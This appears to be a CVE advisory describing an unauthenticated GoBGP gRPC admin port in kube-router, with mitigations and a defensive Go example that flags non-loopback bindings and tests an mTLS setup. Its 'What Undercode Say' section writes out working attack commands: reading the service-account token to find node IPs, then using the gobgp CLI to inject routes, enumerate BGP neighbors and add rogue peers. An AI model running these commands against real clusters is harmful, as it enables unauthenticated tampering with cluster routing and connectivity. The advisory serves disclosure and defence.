The CVE arises because, when kube-router runs with `--run-router` enabled, it starts a GoBGP gRPC management server bound to both `127.0.0.1:50051` and the node's primary IP (for example `192.168.1.10:50051`). The server is enabled by default, uses GoBGP's default admin port 50051, and has neither TLS nor authentication. Because kube-router runs as a `hostNetwork: true` DaemonSet, that socket lives in the node's network namespace, and any pod in the cluster that can reach a node's primary IP can call the GoBGP gRPC API without credentials.

The vulnerable code is in `pkg/controllers/routing/network_routes_controller.go` at lines 1057–1061, where `gobgp.GrpcListenAddress` is given both the node IP and localhost, and no `gobgp.GrpcOption` carrying mTLS or any other authentication is passed.

The GoBGP API exposes write-capable RPCs such as `AddPath`/`DeletePath` (inject or withdraw routes), `AddPeer`/`DeletePeer` (add or remove BGP neighbors) and `AddPolicy`/`DeletePolicy` (modify routing policies), alongside read RPCs such as `ListPeer`/`ListPath` (enumerate peer configuration and routes). An attacker can therefore perform arbitrary BGP route injection, peer enumeration, neighbor manipulation and policy changes.

kube-router's export policy `ROUTE_ACTION_REJECT` prevents most injected routes from being propagated to peers or to the kernel, but an attacker can still pollute the local BGP RIB, enumerate every BGP neighbor, add unauthorized peers (which persist until manually removed) and temporarily delete legitimate peers. The blast radius is cluster-wide: with iBGP, a single successful injection on one node can affect the network connectivity of pods on every node.
dailycve form:
Platform: Kubernetes kube-router
Version: All versions in the default configuration
Vulnerability: Unauthenticated gRPC API
Severity: Critical
Date: Not assigned
Prediction: Patch expected 2024-04-15
What Undercode Say:
```bash
# 1. Discover node InternalIPs from inside a pod. Listing nodes needs RBAC permission that the
#    default service account normally lacks; if the call is forbidden, the node IP is usually
#    also the pod's default gateway or available through the downward API field status.hostIP.
curl -s -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
  https://kubernetes.default.svc/api/v1/nodes \
  | jq -r '.items[].status.addresses[] | select(.type=="InternalIP") | .address'

# 2. Inject a route into the node's local BGP RIB. The gobgp CLI takes host and port as separate
#    flags, and nexthop must be an IP address: 192.0.2.1 is an unroutable documentation address
#    standing in for a blackhole next hop.
gobgp --host 192.168.1.10 --port 50051 global rib add -a ipv4 10.96.0.0/12 nexthop 192.0.2.1

# 3. List all BGP neighbors
gobgp --host 192.168.1.10 --port 50051 neighbor

# 4. Add an unauthorized BGP peer
gobgp --host 192.168.1.10 --port 50051 neighbor add 10.0.0.1 as 65001
```
Exploit:
An attacker runs any pod (privileged or not), discovers a node IP via the Kubernetes API, then uses the `gobgp` CLI or any gRPC client to call `AddPath`, `AddPeer`, `DeletePeer` or `ListPeer` without authentication. The only prerequisites are a running pod and network connectivity to the node IPs.
Protection from this CVE
- Set `--gobgp-admin-port=0` to disable the gRPC server entirely (as described in the report; confirm the flag's behaviour for your kube-router version).
- Bind the server only to localhost by modifying the code: replace the two-address `GrpcListenAddress` call with `fmt.Sprintf("127.0.0.1:%d", nrc.goBGPAdminPort)`.
- Add mTLS authentication via `gobgp.GrpcOption(grpc.Creds(...))`.
- Block port 50051 on the node's primary IP with iptables, on every node: `iptables -I INPUT -p tcp --dport 50051 ! -s 127.0.0.1 -j DROP` (insert rather than append so the rule sits ahead of any earlier ACCEPT rule; a node-level firewall is what actually stops pod-to-node traffic here).
- Kubernetes NetworkPolicy is of limited use: it governs pod-to-pod traffic and is generally not enforced for sockets owned by `hostNetwork` pods, so do not rely on it alone.
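As an added example (not code from kube-router or GoBGP), the following Go program ties together the description of the bug above and the localhost-only and mTLS items of the protection list. `ExposedListenAddrs` audits a set of gRPC listen addresses and flags every one that is not loopback, `NewMTLSConfig` builds the `tls.Config` that would be wrapped as `credentials.NewTLS(cfg)` and handed to `grpc.Creds` (the `gobgp.GrpcOption` argument the text says is missing), and `ServerRejectsClientWithoutCert` proves that config by running a loopback TLS listener and connecting a client that presents no certificate. The self-signed CA, the helper names and the example node IP 192.168.1.10 are constructed for this example; a real deployment would issue separate server and client leaf certificates from the cluster PKI.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"time"
)

// ExposedListenAddrs returns the host:port entries not bound to a loopback address; on a hostNetwork pod each is reachable from other pods.
func ExposedListenAddrs(addrs []string) []string {
	var exposed []string
	for _, a := range addrs {
		host, _, _ := net.SplitHostPort(a) // a parse failure leaves host empty, which is treated as exposed
		if ip := net.ParseIP(host); ip == nil || !ip.IsLoopback() { // "" (all interfaces) is not loopback
			exposed = append(exposed, a)
		}
	}
	return exposed
}

// NewMTLSConfig is the server-side policy for the mTLS fix: each client must present a certificate
// chaining to caPool. Wrapped as credentials.NewTLS(cfg) and given to grpc.Creds, it is the missing ServerOption.
func NewMTLSConfig(serverCert tls.Certificate, caPool *x509.CertPool) *tls.Config {
	return &tls.Config{
		Certificates: []tls.Certificate{serverCert},
		ClientAuth:   tls.RequireAndVerifyClientCert,
		ClientCAs:    caPool,
		MinVersion:   tls.VersionTLS13,
	}
}

func must(err error) {
	if err != nil {
		panic(err)
	}
}

// newSelfSignedCA builds a throwaway CA that doubles as the server certificate so the example runs
// offline (constructed here; a real deployment issues separate leaves from the cluster PKI).
func newSelfSignedCA() (tls.Certificate, *x509.CertPool) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	must(err)
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "gobgp-admin-ca"},
		NotBefore:             time.Now().Add(-time.Minute),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
		IPAddresses:           []net.IP{net.ParseIP("127.0.0.1")},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	must(err)
	leaf, err := x509.ParseCertificate(der)
	must(err)
	pool := x509.NewCertPool()
	pool.AddCert(leaf)
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key}, pool
}

// ServerRejectsClientWithoutCert runs a TLS listener on an ephemeral loopback port with cfg and reports whether it refuses a certificate-less client.
func ServerRejectsClientWithoutCert(cfg *tls.Config, caPool *x509.CertPool) (bool, error) {
	ln, err := tls.Listen("tcp", "127.0.0.1:0", cfg)
	if err != nil {
		return false, err
	}
	defer ln.Close()
	serverErr := make(chan error, 1)
	go func() {
		c, err := ln.Accept()
		if err != nil {
			serverErr <- err
			return
		}
		defer c.Close()
		serverErr <- c.(*tls.Conn).Handshake() // fails with "client didn't provide a certificate"
	}()
	client, err := tls.Dial("tcp", ln.Addr().String(), &tls.Config{RootCAs: caPool})
	if err == nil {
		_, _ = client.Read(make([]byte, 1)) // under TLS 1.3 the client sees the alert only on its first read
		client.Close()
	}
	return (<-serverErr) != nil, nil
}

func main() {
	fmt.Println("exposed:", ExposedListenAddrs([]string{"127.0.0.1:50051", "192.168.1.10:50051"}))
	cert, pool := newSelfSignedCA()
	rejected, err := ServerRejectsClientWithoutCert(NewMTLSConfig(cert, pool), pool)
	fmt.Println("mTLS listener refused a client with no certificate:", rejected, err)
}
```

Run it with `go run`: the first line lists `192.168.1.10:50051` as the exposed binding and the last reports that the mTLS listener refused the client. The gRPC wiring itself (`credentials.NewTLS`, `grpc.Creds`) needs the google.golang.org/grpc module and is left out so the example builds with the standard library alone.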
Impact:
- BGP route injection into local RIB (pollution, potential for future escalation if `ROUTE_ACTION_REJECT` is changed).
- Full enumeration of BGP peer configurations (ASNs, session states, metadata) without any credentials.
- Unauthorized addition, modification, or deletion of BGP neighbors (added peers persist; legitimate ones are temporarily removed until sync).
- Modification of BGP routing policies within the local RIB.
- Cluster-wide effect, because iBGP propagates changes made on one node to all the others and so to every pod's network connectivity.
Sources:
Reported By: github.com